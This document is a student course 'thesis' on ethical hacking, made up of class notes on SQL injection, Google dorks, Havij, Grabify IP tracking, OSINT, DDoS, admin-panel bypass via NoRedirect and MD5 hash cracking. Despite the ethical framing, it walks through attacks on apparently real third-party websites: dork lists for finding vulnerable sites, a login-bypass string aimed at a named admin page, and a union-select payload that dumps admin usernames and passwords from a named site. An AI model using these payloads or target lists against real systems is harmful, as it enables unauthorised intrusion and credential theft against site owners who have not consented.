1

Ethical hacking

A thesis submitted in partial fulfillment of the

requirements for the course of Ethical hacking

By MD TANJIM HOSSAIN
On Jun 22

Arena Web Security

On Jun 22
 2

Declaration by student
I, MD Tanjim Hossain Currently a Class 10 student of Darul Ulum Alia Madrashai, hereby
declare that the work presented herein is original work done by me under the supervison of
Fahim Al Tanjim and has not been published or submitted elsewhere for the requirement of a
degree programme. Any literature date or work done by other and cited within this thesis has
given due acknowledgement and listed in the reference section.

MD Tanjim Hossain
Place: Arena Web Security Date:
 3

Certificate
Certified that the thesis entitled “Ethical Hacking” submitted by Tanjim Hossain towards
partial fulfillment for the Course of ethical hacking done by the institution of Arena web
security is based on the investigation and learning done till now from the beginning of the
course carried out under our guidance. The thesis part therefore has not submitted for the
academic award of any other university or institution.

Countersigned

……………………… ……………………..

(Tanjim Al Fahim) (MD Tanjim Hossain)

Supervisor Batch : 38

Abstract:
The apparatus of hacking refers to the evolution of programs that are required for coding
purposes, which in turn give way to more promising security coupled with better efficiency. On
the other hand, excess and obsession of particular interest can lead to issues. Ethical hacking
these days is used as a common and favored process to analyze the security systems and
programs of an organization. It runs parallel with security judgment, red teaming, intrusion
testing, and vulnerability. Here are certain important points that will help you understand more
about ethical hacking and its necessity.
Keywords :

Acknowledgement

I would like to express my sincere gratitude to our honourable course instructor and
supervisor Tanjim Al Fahim Sir, And also Jewel sir and all the moderator and admin for
their continuous advice effort and invertible suggestion throughout the research.
 4
I am really grateful to them.

I would also like to thank to all my course mate of this course who adviced ,helped and
suggest me in need of the entire courses whenever I stucked In some point.
Thank you.

Table Of Contents

Page No
CHAPTER 1 BASIC SQL INJECTION AND GOOGLE DORKING 5

CHAPTER 2 OSINT AND FORENSIC 7

CHAPTER 3 HAVIJ AND URL STRUCTURE. 10

CHAPTER 4 NO REDIRECT 13

CHAPTER 5 CRYPTOGRAPHY 15

CHAPTER 6 MANUAL SQL INJECTION 18

CHAPTER 7 WAF BYPASS. 19

CHAPTER 8 XSS

CHAPTER 9 LOCAL FILE INCLUSION (LFI) vvvvvvvv.

CHAPTER 10 REMOTE CODE EXECUTION (RCE) BB.

CHAPTER 11 FILE UPLOAD VULNERABILITY

 5
CHAPTER 12 CROSS SIRE REQUEST FORGERY (CSRF)

CHAPTER 13 KALI LINUX AND TOOLS

CHAPTER 14 RECON/INFORMATION GATHERING

CHAPTER 15 PENETRATION TESTING

CONCLUSION 21
 6

Class-01: (Basic Sql Injection)

Basic Sql Injection
SQL injection is a code injection technique that is enough sometimes to destroy our database
of an website.SQL injection is one of the most common web hacking techniques.

SQL injection usually occurs when we ask an user for input, like their username/userid, and
instead of a name/id, the user gives us an SQL statement that we will unknowingly run on our
database.
Before we go into the basic Sql injection that how it occurs we have to know first what is
vulnerability of a website mean.
Web Vulnerability: A website vulnerability is a weakness of a website or web application
code that allows an attacker to gain some level of control of the site, and possibly the hosting
server. If the vulnerability of a website is quite large or if it has low or high level fo
vernability then there is a possibility for the bad guys or the attackers to attack that website.
So to find such kind of website which has vulnerability we need the help of google dork. So
what is google dork?
Google dork: Google dorking, is a computer hacking technique that uses Google Search and
other Google applications to find security holes in the configuration and computer code that
websites use.
By using google dork we can find all those websites which contains vulnerabilities for this at
first we need to search in the google using google dork. Here are some of the list of some
google dork:
Google Dorks compilation to find SQL injections:

inurl:index.php?id= inurl:trainers.php?id=

inurl:buy.php?category= inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:Pageid= inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=
 7

inurl:show.php?id=

inurl:view_product.php?id=

There are different ways to attack and get access into a website in this part we have learned
about basic sql.

User: 1 'or' 1 '=' 1

Pass: 1 'or' 1 '=' 1

We will need the above user and password to get access in the website.

So how it works?

Each and every website has a database in that database if we put a wrong username and false
query then it will suddenly alert us.

B ut if we put the above qury in the username and password field then the database will
consider it as true and give the attacker the unauthorised access.

The website wont understand about the false query and the hacker will easily get access with
the 1=1 query.

Example:

We can use the below link as an example :

https://sidm.in/admin/login

Figure :1
 8

Figure :2

Class-02(Havij and Grabify)

Havij
Havij is nothing but a tool which can be used to find out the information from the database
that we want to exploit. For example if we choose username and password it will show us
those website which has any vulnerability issues.
Using the same dork that we have used earlier in basic sql injection we have to use the same in
havij as well. It is another method of getting access to a website. But in this case we will need
a software to get the username and password of that website that we have targeted to get
unauthorized access.So in the very beginning we need to Find those website with the google
dork.
Definitely we should try the access in a website which has vulnerability.
To work with havij we have to keep in find if th url of that ebsite has //https then we must
have to remove the S from //https and put only //http in the search box.
We should keep in mind that havij only work in the website which has php id with a value
1,2,3 or any numeric data. For example php id= 29.
Some Dork List
 9

1: intitle:"index" of "admin" site:.in or others domain name

2: intitle:"index" of "admin" "framework" site:.in or others domain name
3: intitle:"index" of "admin" "pdf" site:.in or others domain name
4: intitle:"index" of "admin" "gallery" site:.in or others domain name
5: intitle:"index" of "admin" "image" site:.in or others domain name
6: intitle:"index" of "admin" "upload" site:.in or others domain name
7: intitle:"index" of "admin" "banner" site:.in or others domain name
8: intitle:"index" of "admin" "file" site:.in or others domain name
9: intitle:"index" of "admin" "page" site:.in or others domain name 10:
intitle:"index" of "admin" "news" site:.in or others domain name
Example: we can use the below link to provide and example.
http://www.dss.kannuruniversity.ac.in/single-news.php?id=6

Figure :3

Grabify
This tools is useful to gather information of a link or url of an website .It can access
information about user's IP address, location tracker (country, city) and so on. We can view
the full list of features here.
 10

Figure :4

Figure :5

#3(Osint,Domain info and Photo forensic)

Osint
The full form of OSINT is open source intelligence
OSINT is a methodology of collecting and analyzing information/data from publicly
available sources to be used with intelligence against a target. We can use osint to know
 11

someone’s location, name, number, IP address and other public or private credentials.
OSINT depends on how you use the available information.
In the intelligence community, the term "open" refers to overt, publicly available sources
(as opposed to covert or clandestine sources).
Osint is all about how we can learn to use OSINT tools to better understand our own digital
footprint.

Example:
Google search images: We can use google search images to get information of a picture by
just posting it like the picture given below.
But it is not necessary that one will get every information from google search by image we
have go through some other technique to find info from a picture. images.google.com

Figure :6
 12

Figure :7

Domain Big data

It is an Online investigation tool.Through which we can get Ip address, Location email etc
information.
Example:
https://domainbigdata.com

Figure :8
 13

Figure :9

Photo Forensic
It is another online tool used for investigation process .This tool is useful to find out by
zooming a picture to get small written information in the pricture to identify the details of
that picture in a more precise way.
Example:
https://29a.ch/photo-forensics

Figure :10
 14

Class-04: (DDOS ATTACK)

Distributed Network Attacks are often referred to as Distributed Denial of Service (DDoS) attacks. This
type of attack takes advantage of the specific capacity limits that apply to any network resources –
such as the infrastructure that enables a company’s website. The DDoS attack will send multiple
requests to the attacked web resource – with the aim of exceeding the website’s capacity to handle
multiple requests… and prevent the website from functioning correctly.

Example: It is DDOS attack tool which is used to make a website down by continuous request
and overwhelming the server of that website.

ACUNETIX WEB VULNERABILITY SCANNER:

 15

It is a tool used for knowing the vulnerability and weakness of an website .With this tool we
cam know which part of a website contains bug.
Example:

Figure :11

Figure :12
 16

Class: 05 : (No Redirect)

No-redirect
So before we go into the NoRedirect topic we have to know about cookies and sessions.

Cookies and Sessions are used to store information. Cookies are only stored on the client-side
machine, while sessions get stored on the client as well as a server. Session. A session creates
a file in a temporary directory on the server where registered session variables and their
values are stored.

NoRedirect is a Firefox/SeaMonkey extension that lets the user take control of HTTP
redirects. It can be used to interdict an ISP's DNS search redirection hijacks, preview/screen
"shortened" URLs, stop the annoying redirection of "smart" error pages, etc. So what http is
Stands for "Hypertext Transfer Protocol." HTTP is the protocol used to transfer data over
the web. It is part of the Internet protocol suite and defines commands and services used for
transmitting webpage data. HTTP uses a server-client model.
Generally with the help of no-redirect addons we block the urls of the login page later we can
directly go the page of the admin cause the login webpage has already been blocked. Only
blocking the login webpage doesn’t mean that you can enter the dashboard.If we cannot enter
the dashboard even after blocking the page Then we have to find the other page of that
admin.So to find out the other page of an admin page we have to take help from a tools.
During the use of this tool we have to remove the other next part after admin from the url and
place it in the tool search bar.For example:

If one can get access in that website then the tool will show beside the url with a green word
“found” that mean we can use that url to get access of that admin dashboard.But that still
wont assure us that all those url with the green word found will help us to get into the
dashboard.
This method will not work in everywhere we have to try with different technic to get access in
a website.

Example:
From the redirect addons we have blocked the admin page.
After that we will search with the same link below removing the letters after admin. If still it
wont take us to the dashboard then we have to look for the other address for the admin panel
for this we will go to the next step below.
http://www.andamanisland.in/admin/index.php
 17

Figure :13

We will go to the below link and search with the address and remove the letters after admin
and put it in the search box.
http://elearn.psyec.edu.in/plus.php

Figure :14

Then we search the admin panel with another admin name that we have found from the Cyber
71 exploit tool.Only the url with having Green written Found can be used for the search.
 18

Figure :15

Class: 06 : (MANUAL SQL

INJECTION)
Manual SQL Injection
Every Website has a database. Where they store all the information within its
server. In every database main information stored in the columns and rows. So
first off all we will find out that how many columns are there in this website
by using:

6 Order by 1-- (INT)

6' Order by 1---+ (STRING [6 is the number of id; like php?id=6 and 1 is the
number of columns]
6 Union select 1,2,3,4,5,6-- (INT)
6' Union select 1,2,3,4,5,6--+ (STRING)
[Are sorted 1-6 in sequence. might have to use (-/.)
This. Like this Id=-6 or id=.6]
After this step, Which column is most vulnerable to attack in that column for get the database.
These steps are following for attacking.
Union based ->DIOS My SQL ->DIOS by WAF (if it not worked then try another one)
 19

(Copy DIOS link and execute in New tab)

Then get data from those columns.

6 Union select 1,2,3,4,5, group_concat(column name) from (__data name__)-- (INT)

6' Union select 1,2,3,4,5, group_concat(column name) from (__data name__)-+(STRING)

Example: For giving an example we can use the following link.

http://www.chocolatekids.co.in/gallery.php?id=-5' union select
1,group_concat(ad_name,0x3d,ad_pwd),3 from admin --+

Figure :16

Class: 07: (CRYPTOGRAPHY)

Cryptography is the science of using mathematics to encrypt and decrypt data. Cryptography
enables you to store sensitive information or transmit it across insecure networks (like the
Internet) so that it cannot be read by anyone except the intended recipient.
 20

While cryptography is the science of securing data, cryptanalysis is the science of analyzing
and breaking secure communication. Classical cryptanalysis involves an interesting
combination of analytical reasoning, application of mathematical tools, pattern finding,
patience, determination, and luck. Cryptanalysts are also called attackers.
Cryptology embraces both cryptography and cryptanalysis. We
can use the below link to mirror anything.

We should also know about the term encryption and decryption to go further into details.
Encryption: In cryptography, encryption is the process of encoding information. This process
converts the original representation of the information, known as plaintext, into an alternative
form known as ciphertext.

Decryption: Decryption is a process of converting encoded/encrypted data in a form

that is readable and understood by a human or a computer. This method is
performed by un-encrypting the text manually or by using keys used to encrypt the
original data.

Example: We will encrypt a data with the use of the link below:
https://www.calcresult.com/misc/cyphers/mirror.html

Figure :17
Then we will copy the MD5 hash data and decrypt it with the following link .
https://hashtoolkit.com/decrypt-hash/
 21

Figure :18

https://crackstation.net/

Figure :19

Conclusions: I would like to say that this course has enriched my knowledge on ethical
hacking not to make any harm of others but to know how a exploit or attack might happen so
that we can keep us alert from any kind of attacks from the attackers. The prime purpose of
 22

ethical hacking is to prevent sensitive data from falling into enemy hands. It safeguards your
company from blackmail by those willing to exploit the vulnerabilities. Via real-world
testing, you can enhance your digital network security and prevent security breaches